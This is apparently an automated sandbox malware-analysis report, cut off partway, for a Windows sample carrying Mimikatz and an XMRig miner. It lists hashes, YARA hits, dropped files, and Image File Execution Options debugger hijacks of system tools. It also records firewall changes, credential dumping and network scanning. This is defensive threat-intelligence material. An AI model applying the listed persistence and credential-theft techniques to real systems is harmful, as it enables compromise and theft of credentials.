Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
12-08-2024 10:43
Behavioral task
behavioral1
Sample
2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe
-
Size
8.8MB
-
MD5
3cfc07636e83894437e3cad25f78d3b3
-
SHA1
a85dfae16d53a1900797dc66c75ffc25c3c46679
-
SHA256
e99e79cf213237dee5606a687ac11cbc1a9494c81dc31393e15f81daf9f53287
-
SHA512
da23f76fac7351290379fda6124d1e7d061dcdc75431a275f1b85dcd3dfcd973eca91b419f285e29735115e333d825bc602797b1f7fbbf5234334812287b0f03
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 212 created 2096 212 upwllyl.exe 37 -
Contacts a large (19535) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3936-182-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-194-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-200-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-212-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-226-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-236-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-253-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-268-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-269-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig behavioral2/memory/3936-271-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
resource yara_rule behavioral2/memory/4608-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4608-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000700000002343a-6.dat mimikatz behavioral2/memory/4036-138-0x00007FF6BAB00000-0x00007FF6BABEE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts upwllyl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts upwllyl.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" upwllyl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4700 netsh.exe 2456 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 4956 upwllyl.exe 212 upwllyl.exe 1580 wpcap.exe 4880 kbnuknqlp.exe 4036 vfshost.exe 4196 nbffjjzcl.exe 2264 xohudmc.exe 4108 ogmqci.exe 3936 ikjyge.exe 2316 nbffjjzcl.exe 1868 nbffjjzcl.exe 3460 nbffjjzcl.exe 1380 nbffjjzcl.exe 4852 nbffjjzcl.exe 864 nbffjjzcl.exe 1764 nbffjjzcl.exe 2996 nbffjjzcl.exe 1116 nbffjjzcl.exe 2428 nbffjjzcl.exe 1316 nbffjjzcl.exe 3180 nbffjjzcl.exe 4384 upwllyl.exe 3256 nbffjjzcl.exe 3796 nbffjjzcl.exe 3684 nbffjjzcl.exe 2608 nbffjjzcl.exe 1708 nbffjjzcl.exe 1108 nbffjjzcl.exe 1100 ileuysiin.exe -
Loads dropped DLL 12 IoCs
pid Process 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 1580 wpcap.exe 4880 kbnuknqlp.exe 4880 kbnuknqlp.exe 4880 kbnuknqlp.exe -
resource yara_rule behavioral2/files/0x0007000000023491-134.dat upx behavioral2/memory/4036-136-0x00007FF6BAB00000-0x00007FF6BABEE000-memory.dmp upx behavioral2/memory/4036-138-0x00007FF6BAB00000-0x00007FF6BABEE000-memory.dmp upx behavioral2/files/0x000700000002349c-141.dat upx behavioral2/memory/4196-142-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/4196-146-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/files/0x0007000000023499-163.dat upx behavioral2/memory/3936-164-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/2316-171-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/1868-175-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3460-179-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-182-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/1380-184-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/4852-188-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/864-192-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-194-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/1764-197-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-200-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/2996-202-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/1116-206-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/2428-210-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-212-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/1316-215-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3180-219-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-226-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/3256-228-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3796-231-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3684-233-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/2608-235-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-236-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/1708-238-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/1108-240-0x00007FF7C2EE0000-0x00007FF7C2F3B000-memory.dmp upx behavioral2/memory/3936-253-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/3936-268-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/3936-269-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx behavioral2/memory/3936-271-0x00007FF6DFFD0000-0x00007FF6E00F0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 95 ifconfig.me 94 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache upwllyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 upwllyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2DEAA270F2A3ADDABB8505E3C5BD28E8 upwllyl.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE upwllyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft upwllyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 upwllyl.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 upwllyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData upwllyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2DEAA270F2A3ADDABB8505E3C5BD28E8 upwllyl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies upwllyl.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content upwllyl.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ebetisly\spoolsrv.xml upwllyl.exe File opened for modification C:\Windows\ebetisly\svschost.xml upwllyl.exe File opened for modification C:\Windows\ebetisly\docmicfg.xml upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\ssleay32.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\vimpcsvc.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\svschost.xml upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\docmicfg.xml upwllyl.exe File created C:\Windows\ebetisly\svschost.xml upwllyl.exe File created C:\Windows\kvbeuieka\Corporate\vfshost.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\svschost.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\docmicfg.xml upwllyl.exe File created C:\Windows\kvbeuieka\Corporate\mimilib.dll upwllyl.exe File opened for modification C:\Windows\ebetisly\upwllyl.exe 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe File created C:\Windows\kvbeuieka\ebcevjhrl\wpcap.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\schoedcl.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\Shellcode.ini upwllyl.exe File created C:\Windows\ebetisly\schoedcl.xml upwllyl.exe File created C:\Windows\kvbeuieka\upbdrjv\swrpwe.exe upwllyl.exe File created C:\Windows\kvbeuieka\ebcevjhrl\scan.bat upwllyl.exe File created C:\Windows\kvbeuieka\ebcevjhrl\kbnuknqlp.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\exma-1.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\tibe-2.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\zlib1.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\schoedcl.xml upwllyl.exe File created C:\Windows\kvbeuieka\ebcevjhrl\Packet.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\cnli-1.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\trfo-2.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\spoolsrv.exe upwllyl.exe File opened for modification C:\Windows\ebetisly\spoolsrv.xml upwllyl.exe File created C:\Windows\kvbeuieka\ebcevjhrl\wpcap.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\coli-0.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\posh-0.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\AppCapture32.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\libxml2.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\trch-1.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\docmicfg.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\spoolsrv.xml upwllyl.exe File opened for modification C:\Windows\ebetisly\vimpcsvc.xml upwllyl.exe File created C:\Windows\ime\upwllyl.exe upwllyl.exe File created C:\Windows\kvbeuieka\ebcevjhrl\ileuysiin.exe upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\libeay32.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\vimpcsvc.xml upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\schoedcl.xml upwllyl.exe File opened for modification C:\Windows\ebetisly\schoedcl.xml upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\xdvl-0.dll upwllyl.exe File created C:\Windows\ebetisly\docmicfg.xml upwllyl.exe File opened for modification C:\Windows\kvbeuieka\ebcevjhrl\Result.txt ileuysiin.exe File opened for modification C:\Windows\kvbeuieka\ebcevjhrl\Packet.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\tucl-1.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\ucl.dll upwllyl.exe File created C:\Windows\kvbeuieka\Corporate\mimidrv.sys upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\crli-0.dll upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\spoolsrv.xml upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\specials\vimpcsvc.xml upwllyl.exe File created C:\Windows\kvbeuieka\ebcevjhrl\ip.txt upwllyl.exe File created C:\Windows\ebetisly\upwllyl.exe 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe File created C:\Windows\kvbeuieka\UnattendGC\svschost.xml upwllyl.exe File created C:\Windows\kvbeuieka\UnattendGC\AppCapture64.dll upwllyl.exe File opened for modification C:\Windows\kvbeuieka\Corporate\log.txt cmd.exe File created C:\Windows\ebetisly\vimpcsvc.xml upwllyl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1764 sc.exe 3844 sc.exe 4240 sc.exe 3472 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language upwllyl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 